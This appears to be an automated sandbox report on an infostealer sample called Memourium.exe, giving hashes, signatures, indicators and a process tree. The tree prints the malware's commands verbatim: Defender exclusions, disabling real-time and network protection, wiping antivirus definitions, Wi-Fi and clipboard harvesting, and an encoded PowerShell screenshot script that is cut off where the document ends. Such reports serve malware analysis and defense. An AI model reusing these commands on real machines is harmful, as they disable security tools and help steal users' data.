Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
09-12-2024 20:39
Behavioral task
behavioral1
Sample
Memourium.exe
Resource
win11-20241007-en
General
-
Target
Memourium.exe
-
Size
5.9MB
-
MD5
fad7aeb4dd7bbaa68f7ad0752f9f5bd3
-
SHA1
7e32d1bca8b94a9e4fe496ffd31b51211181493d
-
SHA256
01b8fc74be043d675cc06de87a38c6df3ed9028144cec1f2de6dd31ac3bbb1ac
-
SHA512
40e79797086aad53b6c264b4f8b3d6654d8e214db6e70249b2f1559f63a9b653832837a8c35fdcb47e74c67fea416a488b819da9501edcbd21b351578223a2e0
-
SSDEEP
98304:aCmoDUN43WQq9jOjFgFEblNHYSxTpirSHcUR43zrwkdA8QJCKC7bN3mb6aItMRUK:aCumWQuOjmFwDRxtYSHdK34kdai7bN3a
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4788 powershell.exe 4248 powershell.exe 3568 powershell.exe 2368 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Memourium.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3932 powershell.exe 3100 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 4300 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 4220 Memourium.exe 4220 Memourium.exe 4220 Memourium.exe 4220 Memourium.exe 4220 Memourium.exe 4220 Memourium.exe 4220 Memourium.exe 4220 Memourium.exe 4220 Memourium.exe 4220 Memourium.exe 4220 Memourium.exe 4220 Memourium.exe 4220 Memourium.exe 4220 Memourium.exe 4220 Memourium.exe 4220 Memourium.exe 4220 Memourium.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 3 discord.com 5 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 5080 tasklist.exe 4092 tasklist.exe 4932 tasklist.exe 2260 tasklist.exe -
resource yara_rule behavioral1/files/0x001900000002aadd-21.dat upx behavioral1/memory/4220-25-0x00007FFA3B7E0000-0x00007FFA3BC46000-memory.dmp upx behavioral1/memory/4220-30-0x00007FFA40200000-0x00007FFA40224000-memory.dmp upx behavioral1/files/0x001c00000002aadb-31.dat upx behavioral1/memory/4220-48-0x00007FFA45900000-0x00007FFA4590F000-memory.dmp upx behavioral1/files/0x001c00000002aad5-47.dat upx behavioral1/files/0x001900000002aad4-46.dat upx behavioral1/files/0x001900000002aad1-45.dat upx behavioral1/files/0x001900000002aad0-44.dat upx behavioral1/files/0x001c00000002aacf-43.dat upx behavioral1/files/0x001900000002aace-42.dat upx behavioral1/files/0x001900000002aacb-41.dat upx behavioral1/files/0x001b00000002aac5-40.dat upx behavioral1/files/0x001900000002aae6-39.dat upx behavioral1/files/0x004600000002aae3-38.dat upx behavioral1/files/0x001900000002aae2-37.dat upx behavioral1/memory/4220-60-0x00007FFA3C340000-0x00007FFA3C4BA000-memory.dmp upx behavioral1/memory/4220-64-0x00007FFA458C0000-0x00007FFA458CD000-memory.dmp upx behavioral1/files/0x001900000002aadc-67.dat upx behavioral1/memory/4220-66-0x00007FFA3FC30000-0x00007FFA3FC5E000-memory.dmp upx behavioral1/files/0x001900000002aada-69.dat upx behavioral1/memory/4220-74-0x00007FFA40200000-0x00007FFA40224000-memory.dmp upx behavioral1/memory/4220-79-0x00007FFA401A0000-0x00007FFA401AD000-memory.dmp upx behavioral1/memory/4220-78-0x00007FFA401D0000-0x00007FFA401FC000-memory.dmp upx behavioral1/memory/4220-102-0x00007FFA390B0000-0x00007FFA391C8000-memory.dmp upx behavioral1/memory/4220-164-0x00007FFA3C340000-0x00007FFA3C4BA000-memory.dmp upx behavioral1/memory/4220-245-0x00007FFA401B0000-0x00007FFA401C9000-memory.dmp upx behavioral1/memory/4220-101-0x00007FFA41580000-0x00007FFA4159F000-memory.dmp upx behavioral1/memory/4220-76-0x00007FFA3FC10000-0x00007FFA3FC25000-memory.dmp upx behavioral1/memory/4220-73-0x00007FFA391D0000-0x00007FFA39549000-memory.dmp upx behavioral1/memory/4220-71-0x00007FFA3C120000-0x00007FFA3C1D8000-memory.dmp upx behavioral1/memory/4220-70-0x00007FFA3B7E0000-0x00007FFA3BC46000-memory.dmp upx behavioral1/memory/4220-62-0x00007FFA401B0000-0x00007FFA401C9000-memory.dmp upx behavioral1/memory/4220-58-0x00007FFA41580000-0x00007FFA4159F000-memory.dmp upx behavioral1/memory/4220-56-0x00007FFA41640000-0x00007FFA41658000-memory.dmp upx behavioral1/memory/4220-54-0x00007FFA401D0000-0x00007FFA401FC000-memory.dmp upx behavioral1/files/0x001900000002aaca-28.dat upx behavioral1/memory/4220-263-0x00007FFA3FC30000-0x00007FFA3FC5E000-memory.dmp upx behavioral1/memory/4220-282-0x00007FFA3C120000-0x00007FFA3C1D8000-memory.dmp upx behavioral1/memory/4220-284-0x00007FFA391D0000-0x00007FFA39549000-memory.dmp upx behavioral1/memory/4220-291-0x00007FFA3C340000-0x00007FFA3C4BA000-memory.dmp upx behavioral1/memory/4220-290-0x00007FFA41580000-0x00007FFA4159F000-memory.dmp upx behavioral1/memory/4220-286-0x00007FFA40200000-0x00007FFA40224000-memory.dmp upx behavioral1/memory/4220-285-0x00007FFA3B7E0000-0x00007FFA3BC46000-memory.dmp upx behavioral1/memory/4220-315-0x00007FFA3B7E0000-0x00007FFA3BC46000-memory.dmp upx behavioral1/memory/4220-324-0x00007FFA3FC30000-0x00007FFA3FC5E000-memory.dmp upx behavioral1/memory/4220-334-0x00007FFA390B0000-0x00007FFA391C8000-memory.dmp upx behavioral1/memory/4220-333-0x00007FFA401A0000-0x00007FFA401AD000-memory.dmp upx behavioral1/memory/4220-332-0x00007FFA3FC10000-0x00007FFA3FC25000-memory.dmp upx behavioral1/memory/4220-331-0x00007FFA3C120000-0x00007FFA3C1D8000-memory.dmp upx behavioral1/memory/4220-330-0x00007FFA391D0000-0x00007FFA39549000-memory.dmp upx behavioral1/memory/4220-323-0x00007FFA458C0000-0x00007FFA458CD000-memory.dmp upx behavioral1/memory/4220-322-0x00007FFA401B0000-0x00007FFA401C9000-memory.dmp upx behavioral1/memory/4220-321-0x00007FFA3C340000-0x00007FFA3C4BA000-memory.dmp upx behavioral1/memory/4220-320-0x00007FFA41580000-0x00007FFA4159F000-memory.dmp upx behavioral1/memory/4220-319-0x00007FFA41640000-0x00007FFA41658000-memory.dmp upx behavioral1/memory/4220-318-0x00007FFA401D0000-0x00007FFA401FC000-memory.dmp upx behavioral1/memory/4220-317-0x00007FFA45900000-0x00007FFA4590F000-memory.dmp upx behavioral1/memory/4220-316-0x00007FFA40200000-0x00007FFA40224000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2552 netsh.exe 3188 cmd.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2500 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4828 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 4788 powershell.exe 4248 powershell.exe 4788 powershell.exe 4248 powershell.exe 3932 powershell.exe 3932 powershell.exe 532 powershell.exe 532 powershell.exe 3932 powershell.exe 532 powershell.exe 3568 powershell.exe 3568 powershell.exe 3560 powershell.exe 3560 powershell.exe 2368 powershell.exe 2368 powershell.exe 2796 powershell.exe 2796 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4788 powershell.exe Token: SeDebugPrivilege 4248 powershell.exe Token: SeDebugPrivilege 4092 tasklist.exe Token: SeDebugPrivilege 5080 tasklist.exe Token: SeIncreaseQuotaPrivilege 792 WMIC.exe Token: SeSecurityPrivilege 792 WMIC.exe Token: SeTakeOwnershipPrivilege 792 WMIC.exe Token: SeLoadDriverPrivilege 792 WMIC.exe Token: SeSystemProfilePrivilege 792 WMIC.exe Token: SeSystemtimePrivilege 792 WMIC.exe Token: SeProfSingleProcessPrivilege 792 WMIC.exe Token: SeIncBasePriorityPrivilege 792 WMIC.exe Token: SeCreatePagefilePrivilege 792 WMIC.exe Token: SeBackupPrivilege 792 WMIC.exe Token: SeRestorePrivilege 792 WMIC.exe Token: SeShutdownPrivilege 792 WMIC.exe Token: SeDebugPrivilege 792 WMIC.exe Token: SeSystemEnvironmentPrivilege 792 WMIC.exe Token: SeRemoteShutdownPrivilege 792 WMIC.exe Token: SeUndockPrivilege 792 WMIC.exe Token: SeManageVolumePrivilege 792 WMIC.exe Token: 33 792 WMIC.exe Token: 34 792 WMIC.exe Token: 35 792 WMIC.exe Token: 36 792 WMIC.exe Token: SeIncreaseQuotaPrivilege 792 WMIC.exe Token: SeSecurityPrivilege 792 WMIC.exe Token: SeTakeOwnershipPrivilege 792 WMIC.exe Token: SeLoadDriverPrivilege 792 WMIC.exe Token: SeSystemProfilePrivilege 792 WMIC.exe Token: SeSystemtimePrivilege 792 WMIC.exe Token: SeProfSingleProcessPrivilege 792 WMIC.exe Token: SeIncBasePriorityPrivilege 792 WMIC.exe Token: SeCreatePagefilePrivilege 792 WMIC.exe Token: SeBackupPrivilege 792 WMIC.exe Token: SeRestorePrivilege 792 WMIC.exe Token: SeShutdownPrivilege 792 WMIC.exe Token: SeDebugPrivilege 792 WMIC.exe Token: SeSystemEnvironmentPrivilege 792 WMIC.exe Token: SeRemoteShutdownPrivilege 792 WMIC.exe Token: SeUndockPrivilege 792 WMIC.exe Token: SeManageVolumePrivilege 792 WMIC.exe Token: 33 792 WMIC.exe Token: 34 792 WMIC.exe Token: 35 792 WMIC.exe Token: 36 792 WMIC.exe Token: SeDebugPrivilege 4932 tasklist.exe Token: SeDebugPrivilege 3932 powershell.exe Token: SeDebugPrivilege 532 powershell.exe Token: SeDebugPrivilege 2260 tasklist.exe Token: SeDebugPrivilege 3568 powershell.exe Token: SeDebugPrivilege 3560 powershell.exe Token: SeIncreaseQuotaPrivilege 4212 WMIC.exe Token: SeSecurityPrivilege 4212 WMIC.exe Token: SeTakeOwnershipPrivilege 4212 WMIC.exe Token: SeLoadDriverPrivilege 4212 WMIC.exe Token: SeSystemProfilePrivilege 4212 WMIC.exe Token: SeSystemtimePrivilege 4212 WMIC.exe Token: SeProfSingleProcessPrivilege 4212 WMIC.exe Token: SeIncBasePriorityPrivilege 4212 WMIC.exe Token: SeCreatePagefilePrivilege 4212 WMIC.exe Token: SeBackupPrivilege 4212 WMIC.exe Token: SeRestorePrivilege 4212 WMIC.exe Token: SeShutdownPrivilege 4212 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1132 wrote to memory of 4220 1132 Memourium.exe 77 PID 1132 wrote to memory of 4220 1132 Memourium.exe 77 PID 4220 wrote to memory of 4832 4220 Memourium.exe 78 PID 4220 wrote to memory of 4832 4220 Memourium.exe 78 PID 4220 wrote to memory of 796 4220 Memourium.exe 79 PID 4220 wrote to memory of 796 4220 Memourium.exe 79 PID 796 wrote to memory of 4248 796 cmd.exe 82 PID 796 wrote to memory of 4248 796 cmd.exe 82 PID 4832 wrote to memory of 4788 4832 cmd.exe 83 PID 4832 wrote to memory of 4788 4832 cmd.exe 83 PID 4220 wrote to memory of 3444 4220 Memourium.exe 84 PID 4220 wrote to memory of 3444 4220 Memourium.exe 84 PID 4220 wrote to memory of 2040 4220 Memourium.exe 85 PID 4220 wrote to memory of 2040 4220 Memourium.exe 85 PID 3444 wrote to memory of 4092 3444 cmd.exe 88 PID 3444 wrote to memory of 4092 3444 cmd.exe 88 PID 2040 wrote to memory of 5080 2040 cmd.exe 89 PID 2040 wrote to memory of 5080 2040 cmd.exe 89 PID 4220 wrote to memory of 2032 4220 Memourium.exe 91 PID 4220 wrote to memory of 2032 4220 Memourium.exe 91 PID 2032 wrote to memory of 792 2032 cmd.exe 93 PID 2032 wrote to memory of 792 2032 cmd.exe 93 PID 4220 wrote to memory of 3100 4220 Memourium.exe 160 PID 4220 wrote to memory of 3100 4220 Memourium.exe 160 PID 4220 wrote to memory of 5016 4220 Memourium.exe 95 PID 4220 wrote to memory of 5016 4220 Memourium.exe 95 PID 4220 wrote to memory of 2476 4220 Memourium.exe 97 PID 4220 wrote to memory of 2476 4220 Memourium.exe 97 PID 4220 wrote to memory of 3188 4220 Memourium.exe 158 PID 4220 wrote to memory of 3188 4220 Memourium.exe 158 PID 4220 wrote to memory of 2168 4220 Memourium.exe 101 PID 4220 wrote to memory of 2168 4220 Memourium.exe 101 PID 4220 wrote to memory of 3640 4220 Memourium.exe 104 PID 4220 wrote to memory of 3640 4220 Memourium.exe 104 PID 4220 wrote to memory of 3352 4220 Memourium.exe 105 PID 4220 wrote to memory of 3352 4220 Memourium.exe 105 PID 5016 wrote to memory of 4932 5016 cmd.exe 108 PID 5016 wrote to memory of 4932 5016 cmd.exe 108 PID 3188 wrote to memory of 2552 3188 cmd.exe 109 PID 3188 wrote to memory of 2552 3188 cmd.exe 109 PID 2476 wrote to memory of 2448 2476 cmd.exe 110 PID 2476 wrote to memory of 2448 2476 cmd.exe 110 PID 2168 wrote to memory of 4828 2168 cmd.exe 111 PID 2168 wrote to memory of 4828 2168 cmd.exe 111 PID 3100 wrote to memory of 3932 3100 cmd.exe 112 PID 3100 wrote to memory of 3932 3100 cmd.exe 112 PID 3352 wrote to memory of 532 3352 cmd.exe 113 PID 3352 wrote to memory of 532 3352 cmd.exe 113 PID 3640 wrote to memory of 4416 3640 cmd.exe 114 PID 3640 wrote to memory of 4416 3640 cmd.exe 114 PID 4220 wrote to memory of 768 4220 Memourium.exe 115 PID 4220 wrote to memory of 768 4220 Memourium.exe 115 PID 4220 wrote to memory of 3360 4220 Memourium.exe 117 PID 4220 wrote to memory of 3360 4220 Memourium.exe 117 PID 768 wrote to memory of 4572 768 cmd.exe 147 PID 768 wrote to memory of 4572 768 cmd.exe 147 PID 3360 wrote to memory of 4824 3360 cmd.exe 120 PID 3360 wrote to memory of 4824 3360 cmd.exe 120 PID 4220 wrote to memory of 3772 4220 Memourium.exe 121 PID 4220 wrote to memory of 3772 4220 Memourium.exe 121 PID 4220 wrote to memory of 1784 4220 Memourium.exe 123 PID 4220 wrote to memory of 1784 4220 Memourium.exe 123 PID 3772 wrote to memory of 3328 3772 cmd.exe 125 PID 3772 wrote to memory of 3328 3772 cmd.exe 125 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 4824 attrib.exe 2604 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Memourium.exe"C:\Users\Admin\AppData\Local\Temp\Memourium.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Users\Admin\AppData\Local\Temp\Memourium.exe"C:\Users\Admin\AppData\Local\Temp\Memourium.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Memourium.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Memourium.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:2448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
PID:3640 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:4416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA